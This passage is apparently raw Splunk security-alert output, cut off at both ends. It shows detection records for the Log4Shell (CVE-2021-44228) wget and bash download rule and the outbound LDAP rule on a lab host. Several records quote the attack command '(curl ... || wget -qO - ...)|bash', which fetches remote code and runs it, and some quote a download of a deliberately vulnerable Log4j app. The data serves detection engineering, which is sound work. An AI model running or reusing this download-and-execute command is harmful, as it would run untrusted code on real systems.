the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or macOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. Note that the wget child process on its own does not show the pipe to bash (this event's process is a plain `wget <url>` with no pipe); confirm the behavior from the parent command line, e.g. `/bin/sh -c (curl ... || wget -qO - ...)|bash`, before treating the event as execution rather than a download only.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641554, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="CIS 13", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 12", annotations._all="Actions on Objectives", annotations._all="PR.DS", annotations._all="PR.PT", annotations._all="Stage:Initial Access", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="Command and Control", annotations._all="T1059", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
